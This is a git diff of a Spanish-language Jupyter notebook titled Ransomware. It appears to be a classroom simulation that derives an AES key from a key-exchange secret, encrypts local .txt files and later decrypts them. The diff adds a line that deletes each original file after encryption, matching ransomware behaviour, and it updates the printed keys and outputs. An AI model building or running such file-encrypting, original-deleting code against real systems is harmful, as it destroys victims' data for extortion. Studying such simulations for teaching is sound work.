--- a/Ransomware.ipynb
+++ b/Ransomware.ipynb
@@ -24,7 +24,7 @@
           "base_uri": "https://localhost:8080/"
         },
         "id": "pB-kg3bxJ9vg",
-        "outputId": "89cf6ab1-f477-4a07-8f0a-6a918e8ed87f"
+        "outputId": "a098ed4b-1525-46fd-9745-8d9ac7d0b167"
       },
       "execution_count": null,
       "outputs": [
@@ -32,12 +32,7 @@
           "output_type": "stream",
           "name": "stdout",
           "text": [
-            "Collecting pycryptodome\n",
-            "  Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)\n",
-            "Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.3 MB)\n",
-            "\u001b[?25l   \u001b[90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[0m \u001b[32m0.0/2.3 MB\u001b[0m \u001b[31m?\u001b[0m eta \u001b[36m-:--:--\u001b[0m\r\u001b[2K   \u001b[91m━━━━━━━━\u001b[0m\u001b[90m╺\u001b[0m\u001b[90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[0m \u001b[32m0.5/2.3 MB\u001b[0m \u001b[31m14.5 MB/s\u001b[0m eta \u001b[36m0:00:01\u001b[0m\r\u001b[2K   \u001b[91m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[0m\u001b[91m╸\u001b[0m \u001b[32m2.3/2.3 MB\u001b[0m \u001b[31m40.7 MB/s\u001b[0m eta \u001b[36m0:00:01\u001b[0m\r\u001b[2K   \u001b[90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[0m \u001b[32m2.3/2.3 MB\u001b[0m \u001b[31m26.7 MB/s\u001b[0m eta \u001b[36m0:00:00\u001b[0m\n",
-            "\u001b[?25hInstalling collected packages: pycryptodome\n",
-            "Successfully installed pycryptodome-3.23.0\n"
+            "Requirement already satisfied: pycryptodome in /usr/local/lib/python3.11/dist-packages (3.23.0)\n"
           ]
         }
       ]
@@ -140,7 +135,7 @@
           "base_uri": "https://localhost:8080/"
         },
         "id": "0poJUpEzLCqS",
-        "outputId": "76d51dd7-d051-4eed-a327-4762cffad5fb"
+        "outputId": "3872c150-bcf3-480e-bfed-05065233df5f"
       },
       "execution_count": null,
       "outputs": [
@@ -159,7 +154,7 @@
             "Descifrando partes del secreto...\n",
             "Calculando secreto compartido...\n",
             "Secreto compartido generado exitosamente.\n",
-            "Secreto compartido (en hexadecimal): 986b8110689f8417f7c7f6caf8e9cc8b6f4e14dff0f7beddcf2595b7dc9a8c2c193da02040c861bac5a366a6236ecac10c5747381d6d1e22b568d30d4767fc29b8494687410268f704120808207a76a3fd1b521387037e8c580cc78fd015e65affdd46a982776764aa63b9550ab66dd6c76d007dee3ac9b75a219dd37a23d7de\n"
+            "Secreto compartido (en hexadecimal): 2d01609c40ca7287aff225481d3814d92057e7d0443b9dffa01db1148696749e5a952cce6c991a36ecb3a8123d70a03242b24e85e8a4a2e96894ff7e9575b375551c1cbcf1ba4ef0a5f5cb6b638c64f4d2b870cd329421ab9c0a1c1fbdf71c85a41d521e228323dcaf8f154230e1e2412649c83f0c7c4ceedf0ce7bf90a1b0aa\n"
           ]
         }
       ]
@@ -201,9 +196,9 @@
         "    with open(ruta_archivo + '.encrypted', 'wb') as f:\n",
         "        f.write(iv + hash_original + ciphertext)\n",
         "\n",
-        "# Simulación del secreto común (obtenido de la fase anterior)\n",
-        "# En la práctica, esto sería el resultado del protocolo AKE v.2\n",
-        "secreto_comun = S_victima#bytes.fromhex('00112233445566778899aabbccddeeff')  # Ejemplo de 16 bytes\n",
+        "    os.remove(ruta_archivo)\n",
+        "\n",
+        "secreto_comun = S_victima\n",
         "\n",
         "# Derivar la llave simétrica\n",
         "llave_aes = derivar_llave(secreto_comun)\n",
@@ -222,7 +217,7 @@
           "base_uri": "https://localhost:8080/"
         },
         "id": "PP4WDJ_yLd9o",
-        "outputId": "e2593e71-b695-4646-b0c3-85489972bf2d"
+        "outputId": "8faa6cf8-11c3-4e69-ff9f-f9b0dae4fe69"
       },
       "execution_count": null,
       "outputs": [
@@ -230,7 +225,7 @@
           "output_type": "stream",
           "name": "stdout",
           "text": [
-            "Llave AES derivada: e9e186c4ed74817ead52d50754fae30145613c90268102b8e3d553f394c118ab\n",
+            "Llave AES derivada: 7b25e26c8381f18337a2323f7a494c159660f200fbe4384181ef4dad34d99eeb\n",
             "Archivos TXT: ['text_to_encrypt_2.txt', 'text_to_encrypt.txt']\n",
             "Archivo text_to_encrypt_2.txt cifrado y guardado como text_to_encrypt_2.txt.encrypted\n",
             "Archivo text_to_encrypt.txt cifrado y guardado como text_to_encrypt.txt.encrypted\n"
@@ -278,7 +273,7 @@
           "height": 199
         },
         "id": "vLcBaCP-Lj53",
-        "outputId": "dfef6996-1c61-4270-fe74-c031e3bb7b1f"
+        "outputId": "263a72e6-a9a7-4a5d-9fb4-c4b28335d6f2"
       },
       "execution_count": null,
       "outputs": [
@@ -325,7 +320,8 @@
         "def descifrar_archivo(ruta_encrypted, llave):\n",
         "    \"\"\"Descifra un archivo cifrado con AES-256-CBC\"\"\"\n",
         "    with open(ruta_encrypted, 'rb') as f:\n",
-        "        iv = f.read(16)  # Los primeros 16 bytes son el IV\n",
+        "        iv = f.read(16) # Los primeros 16 bytes son el IV\n",
+        "        hash_original = f.read(32)\n",
         "        ciphertext = f.read()  # Resto es el texto cifrado\n",
         "\n",
         "    # Crear cifrador y descifrar\n",
@@ -358,6 +354,7 @@
         "for file in list_files_encrypted:\n",
         "    descifrar_archivo(file, llave_recuperacion)\n",
         "    print(f\"Archivo {file} descifrado como {os.path.splitext(file)[0]}\")\n",
+        "    os.remove(file)\n",
         "\n",
         "if hash_recuperado != hash_original:\n",
         "    raise ValueError(\"Integridad comprometida\")"
@@ -367,7 +364,7 @@
           "base_uri": "https://localhost:8080/"
         },
         "id": "Q7NxE4JiLqka",
-        "outputId": "292f37ae-db5c-45bd-d66c-34774a9d0cbd"
+        "outputId": "6158b2f3-7927-498c-8edf-623e5b4827e9"
       },
       "execution_count": null,
       "outputs": [
@@ -381,7 +378,7 @@
             "1. Usar el secreto compartido para derivar la llave\n",
             "2. Ejecutar el proceso de descifrado\n",
             "\n",
-            "Llave de recuperación: e9e186c4ed74817ead52d50754fae30145613c90268102b8e3d553f394c118ab\n",
+            "Llave de recuperación: 7b25e26c8381f18337a2323f7a494c159660f200fbe4384181ef4dad34d99eeb\n",
             "Archivos TXT: ['text_to_encrypt_2.txt', 'text_to_encrypt.txt']\n",
             "Archivo text_to_encrypt.txt.encrypted descifrado como text_to_encrypt.txt\n",
             "Archivo text_to_encrypt_2.txt.encrypted descifrado como text_to_encrypt_2.txt\n"
